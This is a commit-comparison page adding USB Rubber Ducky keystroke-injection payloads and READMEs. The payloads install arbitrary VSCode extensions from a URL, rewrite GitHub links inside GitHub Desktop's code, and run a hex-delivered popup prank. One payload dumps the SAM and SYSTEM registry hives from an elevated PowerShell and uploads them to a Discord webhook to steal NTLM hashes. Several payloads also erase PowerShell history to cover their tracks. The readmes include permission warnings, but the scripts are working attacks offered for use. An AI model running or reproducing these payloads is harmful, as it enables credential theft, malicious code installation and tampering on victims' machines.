Compare commits
33 Commits
129b207d26
...
52086d7968
Author | SHA1 | Date |
---|---|---|
Aleff | 52086d7968 | |
Peaks | 675972662a | |
Luu | 0df3011601 | |
Luu | a81ecd3e64 | |
Luu | c898ed7858 | |
Luu | 15f8f25701 | |
Peaks | adb9af43f8 | |
Aleff | 3cf199170c | |
Peaks | fd272a60f4 | |
Aleff | 9f1222ba05 | |
Aleff | d934d9d4de | |
Aleff | f031b928a8 | |
Aleff | bb89731ae2 | |
Aleff | 9c4257edbd | |
Aleff | d3e494fd12 | |
Peaks | 02641718a0 | |
Aleff | 2c84ff499c | |
Peaks | 7883e2bc50 | |
Alessandro Greco | b1fae99ade | |
Alessandro Greco | 52c42dfc10 | |
Alessandro Greco | 6e3f5924c0 | |
Aleff | 71d5eaf378 | |
Alessandro Greco | 1fa6cea874 | |
Aleff | e5254c68a2 | |
Alessandro Greco | d350174b13 | |
Alessandro Greco | 284195f4cd | |
Alessandro Greco | 82fcf60fab | |
aleff-github | fe6c828d62 | |
aleff-github | 39ae8691ff | |
Aleff | 3f27f53b23 | |
aleff-github | 8c4ced3125 | |
aleff-github | d44fd457a3 | |
Aleff | 4ca40bc5a8 |
|
@ -0,0 +1,98 @@
|
|||
# Install Any Arbitrary VSCode Extension
|
||||
|
||||
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
|
||||
|
||||
1. Removes any pre-existing version of the extension (if applicable).
|
||||
2. Downloads a ZIP archive of a VSCode extension.
|
||||
3. Extracts the extension to the correct VSCode extensions folder.
|
||||
|
||||
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
|
||||
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
|
||||
- Removes any previous version of the extension.
|
||||
- Completely automated, requiring no manual intervention once the script is executed.
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Target OS**: Windows 10/11
|
||||
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
|
||||
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
|
||||
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
|
||||
|
||||
## Usage
|
||||
|
||||
### DuckyScript Configuration
|
||||
|
||||
Before running the script, make sure to configure the following two variables in the script:
|
||||
|
||||
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
|
||||
```plaintext
|
||||
DEFINE #EXTENSION_NAME example
|
||||
```
|
||||
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
|
||||
|
||||
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
|
||||
```plaintext
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
```
|
||||
|
||||
### PowerShell Commands Breakdown
|
||||
|
||||
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
|
||||
```powershell
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
```
|
||||
|
||||
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
|
||||
```powershell
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
}
|
||||
```
|
||||
|
||||
## Notes
|
||||
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
|
||||
- Make sure that PowerShell is available on the target machine.
|
||||
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,88 @@
|
|||
REM_BLOCK
|
||||
##########################################################
|
||||
# #
|
||||
# Title : Install Any Arbitrary VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10 #
|
||||
# #
|
||||
##########################################################
|
||||
END_REM
|
||||
|
||||
REM Replace "example" with the name of the extension folder
|
||||
DEFINE #EXTENSION_NAME example
|
||||
|
||||
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
END_STRINGLN
|
||||
|
||||
REM May it depends by the extension...
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
}
|
||||
END_STRINGLN
|
|
@ -0,0 +1,55 @@
|
|||
# Install Official VSCode Extension
|
||||
|
||||
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
|
||||
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
|
||||
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
|
||||
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
|
||||
|
||||
## Usage
|
||||
|
||||
### Required Parameter
|
||||
|
||||
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Operating System**: Windows 10 or 11
|
||||
- **PowerShell**
|
||||
- **Visual Studio Code**
|
||||
- **Internet**
|
||||
- **Permissions to execute commands in PowerShell**
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,64 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Install Official VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
|
||||
DEFINE #EXTENSION publisher.extensionName
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
|
@ -0,0 +1,69 @@
|
|||
# Replace Links In GithubDesktop
|
||||
|
||||
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
|
||||
|
||||
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
|
||||
|
||||
## Table of Contents
|
||||
|
||||
- [Features](#features)
|
||||
- [Prerequisites](#prerequisites)
|
||||
- [Usage](#usage)
|
||||
- [Credits](#credits)
|
||||
|
||||
## Features
|
||||
|
||||
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
|
||||
|
||||
1. Detects the installation folder of GitHub Desktop.
|
||||
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
|
||||
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
|
||||
|
||||
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- **Windows 10/11**
|
||||
- **GitHub Desktop** installed on the machine.
|
||||
|
||||
## Usage
|
||||
|
||||
1. **Modify the script**:
|
||||
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
|
||||
```duckyscript
|
||||
DEFINE #NEW_LINK example.com
|
||||
```
|
||||
|
||||
2. **Customization**:
|
||||
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
|
||||
```ducky
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
```
|
||||
|
||||
3. **Execution**:
|
||||
- Upon execution, the script will:
|
||||
- Open PowerShell.
|
||||
- Detect the GitHub Desktop installation directory.
|
||||
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,109 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Replace Links In GithubDesktop #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
|
||||
REM REQUIRED - Define here the new url that will replace the original github link
|
||||
DEFINE #NEW_LINK example.com
|
||||
|
||||
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
|
||||
|
||||
$versions = $folders | ForEach-Object {
|
||||
[PSCustomObject]@{
|
||||
FolderName = $_.Name
|
||||
Version = [version]($_.Name -replace "app-", "")
|
||||
}
|
||||
}
|
||||
|
||||
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
|
||||
|
||||
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
|
||||
$latestFolderPath += "\resources\app\"
|
||||
$renderer = "renderer.js"
|
||||
$main = "main.js"
|
||||
|
||||
$filePath = "$latestFolderPath$renderer"
|
||||
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
|
||||
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
|
||||
Set-Content -Path $filePath -Value $modifiedContent
|
||||
|
||||
|
||||
$filePath = "$latestFolderPath$main"
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
|
||||
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
|
||||
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
|
||||
END_STRINGLN
|
|
@ -0,0 +1,28 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||
|
||||
## Description
|
||||
|
||||
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord webhook URL
|
||||
* Ensure the webhook permissions are configured
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,34 @@
|
|||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 3000
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||
DELAY 500
|
||||
GUI d
|
|
@ -0,0 +1,74 @@
|
|||
# Pranh(ex)
|
||||
|
||||
This script is named Prenh(ex) because it is the union between **Prank**, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to **hexadecimal**. This script also contains a Time-Based **Easter Egg** so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
|
||||
|
||||
Executables have been removed for security reasons.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
![](assets/1.gif)
|
||||
|
||||
## Description
|
||||
|
||||
This script is named Prenh(ex) because it is the union between Prank, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to hexadecimal. This script also contains a Time-Based Easter Egg so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
|
||||
|
||||
Installing and running executables on machines without explicit owner authorization can **lead to significant damage** both to the **machine** and **legal repercussions** for those who choose to do so. It is crucial to respect ownership rights and seek proper authorization to ensure the security and integrity of the system while staying within the boundaries of the law.
|
||||
|
||||
## Explanation of Prank
|
||||
|
||||
This Python script is designed to be a playful prank, creating a series of unexpected and humorous pop-up messages that make it challenging for the user to close the windows. It utilizes the ctypes library to interact with the Windows API for displaying message boxes with customized icons and button options. The code defines a function, show_error_popup, which takes a message as input and enters an infinite loop, constantly prompting the user with pop-up messages. These messages employ amusing responses to user interactions, such as changing the message text or providing comical feedback. Overall, it's a lighthearted piece of code that aims to entertain and surprise anyone who runs it.
|
||||
|
||||
1. You import the necessary libraries, such as ctypes and sleep.
|
||||
|
||||
2. You define a show_error_popup function that takes a message as an argument.
|
||||
|
||||
3. Inside this function, you start an infinite while loop.
|
||||
|
||||
4. You use ctypes.windll.user32.MessageBoxW to create a popup with the specified message. This popup has an error icon (MB_ICONERROR) and a single "OK" button (MB_OK).
|
||||
|
||||
5. You check the result returned by the dialog window. If the user clicks "OK" (returned value 1), the message is changed to "What do you believe yourself? That I leave so easily?" and the popup is reopened.
|
||||
|
||||
6. If the user clicks "Cancel" (returned value 2), a second popup is displayed with the message "Are you sure you want to close? I will miss you :'(". This popup has an error icon (MB_ICONERROR) and two buttons: "Yes" and "No."
|
||||
|
||||
7. If the user clicks "Yes" (returned value 6) in the second popup, a third popup appears with the message "Okay, I'll stop. But don't get mad...". This popup has an information icon (MB_ICONINFORMATION), and the loop is terminated, thus closing the popup.
|
||||
|
||||
8. If the user clicks "No" in the second popup, the message is changed to "You seem a little indecisive honestly...", and the popup is reopened.
|
||||
|
||||
9. Finally, the show_error_popup function is called with an initial error message, and the popup will be opened. After the user interacts with the popup, there is a 60-second delay before a final popup is displayed with a farewell message.
|
||||
|
||||
In summary, the code creates a popup that playfully teases the user, making it challenging to close, and providing some humorous responses to user clicks. It's a little prank that might bring a smile to anyone who runs it.
|
||||
|
||||
## Dependencies
|
||||
|
||||
* **Nothing** (i know, it's absurd)
|
||||
|
||||
## Note
|
||||
|
||||
- For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
|
||||
- Tested on `Windows 11`
|
||||
- Running checked but not blocked by Avast antivirus
|
||||
- Original Python code in `assets/pranh(ex).py`
|
||||
- Hex content in `assets/hexfile.txt`
|
||||
- exe file in `assets/pranh(ex).exe`
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
Binary file not shown.
After Width: | Height: | Size: 837 KiB |
|
@ -0,0 +1 @@
|
|||
Executables have been removed for security reasons.
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,22 @@
|
|||
import ctypes
|
||||
from time import sleep
|
||||
|
||||
def show_error_popup(message):
|
||||
while True:
|
||||
result = ctypes.windll.user32.MessageBoxW(None, message, 'Errore', 0x10 | 0x1) # 0x10 = MB_ICONERROR, 0x1 = MB_OK
|
||||
if result == 1: # 1 is OK
|
||||
message = "What do you believe yourself? That I leave so easily?"
|
||||
continue # Open the popup
|
||||
elif result == 2: # 2 is Cancel
|
||||
result = ctypes.windll.user32.MessageBoxW(None, "Are you sure you want to close? I will miss you :'(", 'Chiusura', 0x10 | 0x4) # 0x10 = MB_ICONERROR, 0x4 = MB_YESNO
|
||||
if result == 6: # 6 is "Yes"
|
||||
ctypes.windll.user32.MessageBoxW(None, "Okay, I'll stop. But don't get mad...", 'Informazione', 0x40) # 0x40 = MB_ICONINFORMATION
|
||||
break # Close the popup
|
||||
else:
|
||||
message = "You seem a little indecisive honestly...."
|
||||
continue # Open the popup
|
||||
|
||||
error_message = "Yoh bro be very careful with executables!"
|
||||
show_error_popup(error_message)
|
||||
sleep(60) # Time-Based Easter Egg ^^
|
||||
